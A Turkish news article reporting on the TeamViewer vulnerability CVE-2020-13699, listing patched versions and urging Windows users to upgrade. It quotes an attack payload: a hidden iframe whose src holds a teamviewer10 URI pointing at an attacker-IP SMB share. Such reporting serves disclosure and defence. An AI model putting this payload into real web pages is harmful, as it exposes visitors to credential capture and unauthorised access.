Popüler uzaktan erişim ve destek uygulaması Teamviewer, saldırganların arka planda sistemlere erişim sağlayıp uzaktan kod çalıştırmasına imkan veren güvenlik açığını kapattı.
İlgili zafiyet, CVE-2020-13699 takip numarası ile numaralandırılmış durumda ve “Unquoted Search Path or Element (CWE-428)” ismiyle özel kategoride bir zafiyet olarak tanımlanıyor. İlgili güvenlik açığı temelde bilinen bir uygulama tarafından gönderilen parametrelerin herhangi bir kontrol veya kısıtlama ile karşılaşmaması sonucu oluşan açıktan faydalanılarak istismar ediliyor. Uygulamalarda bu şekilde bir açık varsa programlara gönderilen çalıştırma veya fonksiyon parametreleri yerine doğrudan işletim sistemi komutları gönderilerek açıktan faydalanılmaya çalışılıyor.
Bu zafiyeti kullanmak için saldırganların zararlı kod içeren bir web sayfası hazırlaması gerekiyor. Hazırlanan web sayfasına saldırganın istediği zararlı kodu içeren gizli veya 1 piksel gibi çok küçük boyutlarda bir iframe elemanı yerleştirilerek kullanıcıya fark ettirilmeden zararlı kodun çalışması sağlanıyor.
Yukarıdaki gibi kullanıcı tarafından fark edilemeyecek boyutta olan iframe elemanının src özelliğine yerleştirilen ‘teamviewer10: –play \\attacker-IP\share\fake.tvs’. kodu ile “URI Scheme” kullanılarak hedef bilgisayarda bulunan Teamviewer client uygulamasının çalışması sağlanıyor. İlgili iframe içerisinde bulunan link, hedef bilgisayarın SMB protokolünü kullanarak linkte bulunan saldırgana ait ip adresine bağlanmasını sağlıyor.
İlk bağlantı isteğini gönderen hedef makine olduğu ve SMB paylaşımı kullanıldığı için saldırgan tarafından kullanıcının parolasına ihtiyaç kalmadan hedef bilgisayara erişim sağlanabiliyor.
Zafiyeti keşfeden Praetorian firması güvenlik mühendisi Jeffrey Hofmann’a göre ilgili açık birçok Teamviewer versiyonunda kullanılabilir. Açığın birçok versiyonda bulunduğunu teyit eden Teamviewer firması konuyla ilgili Teamviewer 8 ile 15 sürümü arasındaki tüm sürümler için güvenlik güncellemesi yayımladı. Teamviewer konuyla ilgili açıklamasında ayrıca zafiyeti bulup firma ile paylaşan Jeffrey Hofmann’a teşekkür etti. Windows kullanıcılarının Teamviewer uygulamalarını yama uygulanan versiyonlardan birine yükseltmeleri tavsiye ediliyor. Güvenli versiyon numaralarının listesi şu şekilde: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 ve 15.8.3.
